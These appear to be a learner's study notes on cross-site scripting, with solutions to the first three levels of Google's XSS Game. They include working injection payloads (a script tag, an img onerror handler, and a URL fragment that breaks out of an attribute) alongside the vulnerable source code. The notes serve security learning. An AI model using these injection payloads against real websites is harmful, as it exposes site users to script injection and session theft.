XSS: Cross Site Scripting

A typical XSS attack looks like this:

1. Attacker injects malicious code in website's database
2. User requests web page from the database’s web server
3. Web server responds with the attacker’s script as part of the HTML body
4. Victim’s browser executes the attacker’s malicious script

Unlike web security threats like SQL Injection that attack the web application itself, an XSS exploit puts the application’s users.

The Samy Worm

https://en.wikipedia.org/wiki/Samy_(computer_worm)
https://www.youtube.com/watch?v=DtnuaHl378M

DOM: Document Object Model

https://en.wikipedia.org/wiki/Document_Object_Model#/media/File:DOM-model.svg

The XSS Game:

https://xss-game.appspot.com/

level 1: <script>alert('hello')</script>
https://www.w3schools.com/jsref/met_win_alert.asp

level 2: <img src="x" onerror="alert('Pop-up window via stored XSS')"/>
https://www.w3schools.com/jsref/event_onerror.asp
The onerror event is triggered if an error occurs while loading an external file (e.g. a document or an image).

level 3: 
https://xss-game.appspot.com/level3/frame#1' onerror='alert(1)';

source code shows:
function chooseTab(num) {
        // Dynamically load the appropriate image.
        var html = "Image " + parseInt(num) + "<br>";
        html += "<img src='/static/level3/cloud" + num + ".jpg' />";
        $('#tabContent').html(html);

<img src='/static/level3/cloud3' onerror='alert(1)';".jpg' />

Reference:

Solution: http://blog.dornea.nu/2014/06/02/googles-xss-game-solutions/

What is Cross-Site Scripting?: https://blog.stackpath.com/glossary/cross-site-scripting/